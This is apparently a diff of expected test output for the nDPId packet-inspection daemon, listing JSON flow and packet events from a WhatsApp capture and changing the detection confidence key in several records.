00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":505,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":65,"flow_packet_id":1,"flow_last_seen":1655099328045,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655099328045,"pkt":"eJS0JASgYDjgxTWgCABFAAA8L\/pAAD8G0kfAqAJkszzDMcBWFGYVxjf+AAAAAKAC\/\/\/UVQAAAgQFtAQCCApxjaYfAAAAAAEDAwk="} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":506,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":65,"flow_packet_id":2,"flow_last_seen":1655099328158,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655099328158,"pkt":"eJS0JASgYDjgxTWgCABFAAA0L\/tAAD8G0k7AqAJkszzDMcBWFGYVxjf\/2SNcwIAQAIBe7wAAAQEICnGNpo+IgeTO"} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":507,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":65,"flow_packet_id":3,"flow_last_seen":1655099328163,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655099328163,"pkt":"eJS0JASgYDjgxTWgCABFAAA4L\/xAAD8G0knAqAJkszzDMcBWFGYVxjf\/2SNcwIAYAIAZmQAAAQEICnGNppSIgeTORUQAAQ=="} -00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":508,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655099328045,"flow_last_seen":1655099328197,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":282,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1655099328197,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":49238,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":513,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1655091294583,"flow_last_seen":1655091295192,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":322,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1655099328610,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":49182,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":508,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655099328045,"flow_last_seen":1655099328197,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":282,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1655099328197,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":49238,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":513,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1655091294583,"flow_last_seen":1655091295192,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":322,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1655099328610,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":49182,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00563{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":513,"source":"whatsapp.pcap","alias":"nDPId-test","packets-captured":513,"packets-processed":512,"total-skipped-flows":0,"total-l4-payload-len":40128,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":65,"total-detection-updates":0,"total-updates":0,"current-active-flows":3,"total-active-flows":65,"total-idle-flows":62,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":436,"global_ts_msec":1655100445438} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":513,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655100445438,"flow_last_seen":1655100445438,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655100445438,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":49250,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":513,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":1,"flow_last_seen":1655100445438,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655100445438,"pkt":"eJS0JASgYDjgxTWgCABFAAA8dbNAAD8GjI7AqAJkszzDMcBiFGbUEWBGAAAAAKAC\/\/9\/mgAAAgQFtAQCCApxjhQ6AAAAAAEDAwk="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":514,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":2,"flow_last_seen":1655100445526,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655100445526,"pkt":"eJS0JASgYDjgxTWgCABFAAA0dbRAAD8GjJXAqAJkszzDMcBiFGbUEWBH1mTBCIAQAIABwwAAAQEICnGOFJasjGe\/"} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":515,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":3,"flow_last_seen":1655100445560,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655100445560,"pkt":"eJS0JASgYDjgxTWgCABFAAA4dbVAAD8GjJDAqAJkszzDMcBiFGbUEWBH1mTBCIAYAIC8UQAAAQEICnGOFLasjGe\/RUQAAQ=="} -00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":516,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655100445438,"flow_last_seen":1655100445594,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":282,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1655100445594,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":49250,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":516,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655100445438,"flow_last_seen":1655100445594,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":282,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1655100445594,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":49250,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00563{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":521,"source":"whatsapp.pcap","alias":"nDPId-test","packets-captured":521,"packets-processed":520,"total-skipped-flows":0,"total-l4-payload-len":40413,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":66,"total-detection-updates":0,"total-updates":0,"current-active-flows":4,"total-active-flows":66,"total-idle-flows":62,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":442,"global_ts_msec":1655101503188} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":521,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655101503188,"flow_last_seen":1655101503188,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655101503188,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":47296,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":521,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":1,"flow_last_seen":1655101503188,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655101503188,"pkt":"eJS0JASgYDjgxTWgCABFAAA8uEdAAD8GSfrAqAJkszzDMbjAFGZ59kNkAAAAAKAC\/\/+x6gAAAgQFtAQCCArH7AorAAAAAAEDAwk="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":522,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":2,"flow_last_seen":1655101503221,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655101503221,"pkt":"eJS0JASgYDjgxTWgCABFAAA0uEhAAD8GSgHAqAJkszzDMbjAFGZ59kNlF+8VdoAQAKz2ngAAAQEICsfsCkuDiThP"} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":523,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":3,"flow_last_seen":1655101503234,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655101503234,"pkt":"eJS0JASgYDjgxTWgCABFAAA4uElAAD8GSfzAqAJkszzDMbjAFGZ59kNlF+8VdoAYAKyxQAAAAQEICsfsCliDiThPRUQAAQ=="} -00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":524,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655101503188,"flow_last_seen":1655101503267,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1655101503267,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":47296,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":524,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655101503188,"flow_last_seen":1655101503267,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1655101503267,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":47296,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00563{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":529,"source":"whatsapp.pcap","alias":"nDPId-test","packets-captured":529,"packets-processed":528,"total-skipped-flows":0,"total-l4-payload-len":40736,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":67,"total-detection-updates":0,"total-updates":0,"current-active-flows":5,"total-active-flows":67,"total-idle-flows":62,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":448,"global_ts_msec":1655104186658} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":529,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655104186658,"flow_last_seen":1655104186658,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655104186658,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":47900,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":529,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":1,"flow_last_seen":1655104186658,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655104186658,"pkt":"eJS0JASgYDjgxTWgCABFAAA8z9lAAD8GMmjAqAJkszzDMbscFGbxjY\/TAAAAAKAC\/\/\/9wgAAAgQFtAQCCAo4WoeCAAAAAAEDAwk="} 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":530,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":2,"flow_last_seen":1655104186714,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655104186714,"pkt":"eJS0JASgYDjgxTWgCABFAAA0z9pAAD8GMm\/AqAJkszzDMbscFGbxjY\/UkjD8dIAQAIBW5gAAAQEICjhah\/LAS4W5"} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":531,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":3,"flow_last_seen":1655104186877,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655104186877,"pkt":"eJS0JASgYDjgxTWgCABFAAA4z9tAAD8GMmrAqAJkszzDMbscFGbxjY\/UkjD8dIAYAIARCwAAAQEICjhaiHzAS4W5RUQAAQ=="} -00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":532,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655104186658,"flow_last_seen":1655104186938,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":73,"midstream":0,"thread_ts_msec":1655104186938,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":47900,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":537,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655096063383,"flow_last_seen":1655096063826,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":282,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1655104187274,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":49232,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":532,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655104186658,"flow_last_seen":1655104186938,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":73,"midstream":0,"thread_ts_msec":1655104186938,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":47900,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":537,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655096063383,"flow_last_seen":1655096063826,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":282,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1655104187274,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":49232,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00563{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":537,"source":"whatsapp.pcap","alias":"nDPId-test","packets-captured":537,"packets-processed":536,"total-skipped-flows":0,"total-l4-payload-len":41070,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":68,"total-detection-updates":0,"total-updates":0,"current-active-flows":5,"total-active-flows":68,"total-idle-flows":63,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":455,"global_ts_msec":1655105188559} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":537,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655105188559,"flow_last_seen":1655105188559,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655105188559,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":47590,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":537,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":69,"flow_packet_id":1,"flow_last_seen":1655105188559,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655105188559,"pkt":"eJS0JASgYDjgxTWgCABFAAA8S7JAAD8Gto\/AqAJkszzDMbnmFGYb9oTUAAAAAKAC\/\/+DSwAAAgQFtAQCCArH\/lQiAAAAAAEDAwk="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":538,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":69,"flow_packet_id":2,"flow_last_seen":1655105188592,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655105188592,"pkt":"eJS0JASgYDjgxTWgCABFAAA0S7NAAD8GtpbAqAJkszzDMbnmFGYb9oTVXDwEToAQAKxqDAAAAQEICsf+VEPB4STE"} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":539,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":69,"flow_packet_id":3,"flow_last_seen":1655105188604,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655105188604,"pkt":"eJS0JASgYDjgxTWgCABFAAA4S7RAAD8GtpHAqAJkszzDMbnmFGYb9oTVXDwEToAYAKwkrwAAAQEICsf+VE\/B4STERUQAAQ=="} -00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":540,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655105188559,"flow_last_seen":1655105188638,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1655105188638,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":47590,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":540,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655105188559,"flow_last_seen":1655105188638,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1655105188638,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":47590,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":545,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655105755895,"flow_last_seen":1655105755895,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655105755895,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":49428,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":545,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":70,"flow_packet_id":1,"flow_last_seen":1655105755895,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655105755895,"pkt":"eJS0JASgYDjgxTWgCABFAAA8kAlAAD8GcjjAqAJkszzDMcEUFGaXC5Z3AAAAAKAC\/\/9ZoAAAAgQFtAQCCAo4cnlzAAAAAAEDAwk="} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":546,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":70,"flow_packet_id":2,"flow_last_seen":1655105755961,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655105755961,"pkt":"eJS0JASgYDjgxTWgCABFAAA0kApAAD8Gcj\/AqAJkszzDMcEUFGaXC5Z47mWksoAQAIBl6QAAAQEICjhyea4zIlt\/"} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":547,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":70,"flow_packet_id":3,"flow_last_seen":1655105755972,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655105755972,"pkt":"eJS0JASgYDjgxTWgCABFAAA4kAtAAD8GcjrAqAJkszzDMcEUFGaXC5Z47mWksoAYAIAgbgAAAQEICjhyedgzIlt\/RUQAAQ=="} -00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":548,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655105755895,"flow_last_seen":1655105756007,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":73,"midstream":0,"thread_ts_msec":1655105756007,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":49428,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":553,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655097851208,"flow_last_seen":1655097851805,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1655105756270,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":47350,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":548,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655105755895,"flow_last_seen":1655105756007,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":73,"midstream":0,"thread_ts_msec":1655105756007,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":49428,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":553,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655097851208,"flow_last_seen":1655097851805,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1655105756270,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":47350,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00563{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":553,"source":"whatsapp.pcap","alias":"nDPId-test","packets-captured":553,"packets-processed":552,"total-skipped-flows":0,"total-l4-payload-len":41992,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":70,"total-detection-updates":0,"total-updates":0,"current-active-flows":6,"total-active-flows":70,"total-idle-flows":64,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":467,"global_ts_msec":1655105790019} 